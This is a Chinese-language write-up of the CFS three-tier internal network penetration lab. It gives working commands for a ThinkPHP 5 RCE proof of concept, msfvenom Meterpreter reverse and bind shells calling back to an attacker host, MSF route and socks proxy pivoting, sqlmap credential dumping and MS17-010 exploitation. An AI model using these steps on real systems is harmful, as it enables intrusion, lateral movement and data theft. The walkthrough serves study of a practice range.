CFS 三层内网漫游安全测试演练

CFS 三层内网漫游安全测试演练

      • 环境配置
      • 演练

环境配置

靶场环境:

靶场虚拟机下载:https://pan.baidu.com/s/1O9pgm9UZCSIdifMEb0E9ZA#list/path=%2F
提取码:qaza
该靶机的渗透流程如下:
通过攻击机kali192.168.206.128攻击target1 的192.168.206.130,target2和target3不能连接外网,只能再内网进行通信。所以得先渗透target1,然后通过他的22网卡去攻击target2,然后通过target2做跳板来攻击target3
1.虚拟机网络配置:
VMnet1 链接外网
VMnet3 配置的是22网段
VMnet4 配置的是33网段
CFS 三层内网漫游安全测试演练_第1张图片
kali:网络适配器选择 VMnet1
target1网络适配器选择 VMnet1 VMnet3
target2网络适配器选择VMnet3 VMnet4
target3网络适配器选择 VMnet4

选择完成后挨个ping检查一下看是否能ping通。
kali : 192.168.206.128 ,可以ping通target1
CFS 三层内网漫游安全测试演练_第2张图片

target1 :192.168.206.130 / 192.168.22.130
CFS 三层内网漫游安全测试演练_第3张图片

target2 :192.168.22.128 / 192.168.33.128 target2 可以ping通target1
CFS 三层内网漫游安全测试演练_第4张图片

target3:192.168.33.33 可以ping通target2
CFS 三层内网漫游安全测试演练_第5张图片
实现两两互通,即Kali能ping通target1 ;target1能ping通target2 ; target2能ping通target3

靶场网络拓扑图:
CFS 三层内网漫游安全测试演练_第6张图片

2.设置宝塔启动web服务
通过192.168.206.0网段的IP地址打开Tagrget1的宝塔面板

地址:http://你的IP:8888/a768f109/
账号:eaj3yhsl
密码:41bb8fee

CFS 三层内网漫游安全测试演练_第7张图片

打开192.168.206.130的80端口,确保kali可以访问到
CFS 三层内网漫游安全测试演练_第8张图片

Target2也同理,账号密码如下:
给Target2 网络适配器添加一个206网段 也就是VMnet1 不然Kali访问不了,设置好了宝塔之后在删除Target2 的VMnet1的网络配置。

地址:http://你的IP:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..

登录到宝塔面板设置 根据你Target2的22网段IP修改
CFS 三层内网漫游安全测试演练_第9张图片
环境配置到这就完成了,最后删掉Target2的VM1网卡即可
CFS 三层内网漫游安全测试演练_第10张图片
至此环境配置完成。

演练

1.针对Target_1信息搜集与渗透测试:

nmap -sn 192.168.206.0/24     扫描206网段主机
nmap -sV -p 1-65535 -T4 192.168.206.130   扫描目标主机开放端口   

CFS 三层内网漫游安全测试演练_第11张图片
发现开放了80端口,说明目标地址可能存在网站,
CFS 三层内网漫游安全测试演练_第12张图片
2.访问http://192.168.206.130,得知是TP框架
CFS 三层内网漫游安全测试演练_第13张图片
百度搜索发现ThinkPHP V5 存在代码执行漏洞,可以利用工具直接getshell
CFS 三层内网漫游安全测试演练_第14张图片
验证一下是否存在该漏洞POC:
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
CFS 三层内网漫游安全测试演练_第15张图片
成功出现了PHPinfo界面,说明该版本是存在这在漏洞的,接下来就可以直接上工具写入一句话了,当然也可以使用POC写入一句话,不过还是工具方便些。
**注意:**linux下使用\转义$,windows下用^转义
CFS 三层内网漫游安全测试演练_第16张图片
蚂剑链接
CFS 三层内网漫游安全测试演练_第17张图片
3… 针对Target_1信息搜集
查看target1网络信息发现存在两个网卡,还存在着192.168.22.xx网段
CFS 三层内网漫游安全测试演练_第18张图片

MSF生成木马让Target_1上线,需要让Target_1当作跳板去工具Target_2,这个过程是比较麻烦,使用MSF或者CS是比较方便的,所以让Target_1上线MSF。

制作MSF木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.206.128 LPORT=1111 -f elf >shell.elf

CFS 三层内网漫游安全测试演练_第19张图片
MSF监听木马,等待上线

use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
show options
set LHOST 192.168.206.128
set LPORT 1111
exploit

成功接收到target1的回话了。
CFS 三层内网漫游安全测试演练_第20张图片
现在Kali在206网段,target2在22网段,如何实现让Kali访问到22网段呢?msf上有自带的代理CS上面也有,接下来通过MSF上面的代理来实现Kali访问target2。

3.信息收集及配置访问
由于测试环境是我们自己准备的,所以我们知道target2主机的网段及IP地址。但是在实战中,我们应该是未知的,因此我们需要首先进行信息收集,以获得目标target2的相关信息,为进一步的渗透做准备。
拿到会话后进行信息收集,获取网络接口

获取当前的网段: run get_local_subnets
查看路由:run autoroute -p
添加路由:run autoroute -s 192.168.22.0/24

CFS 三层内网漫游安全测试演练_第21张图片

发现存在 22 、29 、 206网段,其中29无关紧要,206与Kali同网段,22与target2是一个网段,Kali是无法访问到22网段的。如何访问到22网段呢,msf和cs都有代理集成功能,我们使用这些功能设置.,先添加路由。
添加路由:run autoroute -s 192.168.22.0/24
可以看到添加路由成功,在session1上面多了一个192.168.22.0的路由了,就表示在session1上面添加了一个22网卡。
CFS 三层内网漫游安全测试演练_第22张图片
  建立路由后kali可以和22网段进行通信(只能在MSF上面进行通信)。那么我们想要通过session1用工具去攻击22网段,这个时候该怎么办呢?
  为了解决这种情况,我们可以在本地(msf上有模块可以开代理)开一个代理,通过这个代理给其他人一个端口去连接,然后我们就可以用自己的本机(自己的电脑,不是攻击机kali)去连接kali的端口,这样就能访问192.168.22.129了

background
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 1100
set version 4a
exploit

CFS 三层内网漫游安全测试演练_第23张图片
修改proxychains配置文件(proxychains工具是kali上自带的全局代理软件;windows下可以使用Proxifier_PE和SocksCap64-Portable)

vi /etc/proxychains4.conf
socks4 192.168.206.128 1100

设置完成后,就可以执行这条命令:proxychains nmap -sT -Pn 192.168.22.0/24 来扫描22网段了,这条命令意思是通过Kali去访问22网段进行nmap扫描。
CFS 三层内网漫游安全测试演练_第24张图片
使用nmap扫描22网段

proxychains nmap -sT -Pn 192.168.22.0/24

这里扫出来了129及其端口:
CFS 三层内网漫游安全测试演练_第25张图片
在windows下可以装个SocksCap64,设置代理
CFS 三层内网漫游安全测试演练_第26张图片
将要使用的工具加入里面就可以了CFS 三层内网漫游安全测试演练_第27张图片
扫描出来了 target2 IP 192.168.22.128 开放了80端口,我们访问一下以WEB作为切入口想办法拿下 target2 ,此时我们游览器是访问不到192.168.22.128,原因是游览器没有加代理,需要设置游览器代理带能访问,
打开游览器设置,点击NetworkSettings
CFS 三层内网漫游安全测试演练_第28张图片
选择使用代理,代理选择SOCKSv4 因为MSF设置的时候是选择的V4,然后设置HOST为Kali的IP,以及port 2222
CFS 三层内网漫游安全测试演练_第29张图片
可以看到游览器可以访问target2的WEB服务了
CFS 三层内网漫游安全测试演练_第30张图片
查看源码发现给到我们一个线索,说SQL注入点:/index.php?r=vul&keyword=1>
CFS 三层内网漫游安全测试演练_第31张图片
那么直接使用Sqlmap来获得到账号密码:

#爆库名
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword --dbs
#爆表名
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D bagecms --tables
#爆列名
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns
#获得账户密码
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump

爆库名:
CFS 三层内网漫游安全测试演练_第32张图片#爆表名
CFS 三层内网漫游安全测试演练_第33张图片爆列名:
CFS 三层内网漫游安全测试演练_第34张图片
获得账户密码
CFS 三层内网漫游安全测试演练_第35张图片
账户密码admin :123qwe
admin 账户密码得到了,想办法找到后台入口,首先扫描一下网站目录。
目录扫描发现 http://192.168.22.128/robots.txt
CFS 三层内网漫游安全测试演练_第36张图片
进入后台

CFS 三层内网漫游安全测试演练_第37张图片
通过后台拿shell,然后对target3进行渗透。
模板可以修改代码,可以在末模版处写入一句话来getshell
CFS 三层内网漫游安全测试演练_第38张图片
CFS 三层内网漫游安全测试演练_第39张图片
蚁剑链接,这里蚁剑是连接不到22网断的,需要在蚁剑中添加代理才能访问。
CFS 三层内网漫游安全测试演练_第40张图片
CFS 三层内网漫游安全测试演练_第41张图片
至此,我们已经渗透到target2,通过查看网络信息得知33网段
MSF上线Target_2
通过msf创建后门建立连接,但是此处的后门要生成一个正向的后门

重点理解:
反向:我们拿下了target_2的web权限,如果我们上传的是反向的木马,那么target_2就要去寻找我们kali的路由,但是target_2主机中没有kali 206网段的路由,那么就会导致我们的反弹shell失败
正向:我们生成了一个正向的木马,我们的kali攻击机就会去主动寻找target_2的服务器,这个时候我们因为做了一个socks的代理,我们的流量会通过kali的ip的2222端口代理给target_1,然后target1_中是存在22网段中的路由的,所以我们可以正常进行连接。

msf正向连接

msfvenom -p linux/x64/meterpreter/bind_tcp lport=3333 -f elf >shell2.elf
background
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit

CFS 三层内网漫游安全测试演练_第42张图片

执行后门文件CFS 三层内网漫游安全测试演练_第43张图片
MSF接收到target2 的回话
CFS 三层内网漫游安全测试演练_第44张图片
还是老步骤,信息收集+配置访问

获取当前的网段: run get_local_subnets
查看路由:run autoroute -p 
添加路由:run autoroute -s 192.168.33.0/24
再次查看路由:run autoroute -p 

CFS 三层内网漫游安全测试演练_第45张图片

添加socket代理

background
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 1111
set version 4a
exploit

设置proxychains.conf

vi /etc/proxychains4.conf
socks4 192.168.206.128 1111

nmap扫描33网段
proxychains nmap -Pn -sT 192.168.33.33
CFS 三层内网漫游安全测试演练_第46张图片
扫描主机为192.168.33.33,并且开放135和445端口,开放这两个端口可以判断是Windows操作系统,使用ms17-010来测试一下:

检测ms17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010    
set RHOST 192.168.33.33
set RPOT 445
exploit

扫描发现存在该漏洞, 目标操作系统是win7
CFS 三层内网漫游安全测试演练_第47张图片
调用ms17-010模块攻击

use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp   //设置正向连接
show options  
set RHOST 192.168.33.33
exploit

攻击成功,成功接收到target3返回的shell.
CFS 三层内网漫游安全测试演练_第48张图片

shell
dir /S flag.txt /B
type C:\Users\Administrator\Desktop\flag.txt


# /B 显示文件夹或文件的名字
# /S 显示指定目录和所有子目录中的文件。

CFS 三层内网漫游安全测试演练_第49张图片

总结:
三层网络中通过MSF强大的路由功能以及socket代理,不断的进行横向移动。MSF上线,查看路由,添加路由,设置socket代理,攻击其他网段目标不断循环。

参考:
CFS三层靶机渗透_Kali版

你可能感兴趣的:(安全,web安全)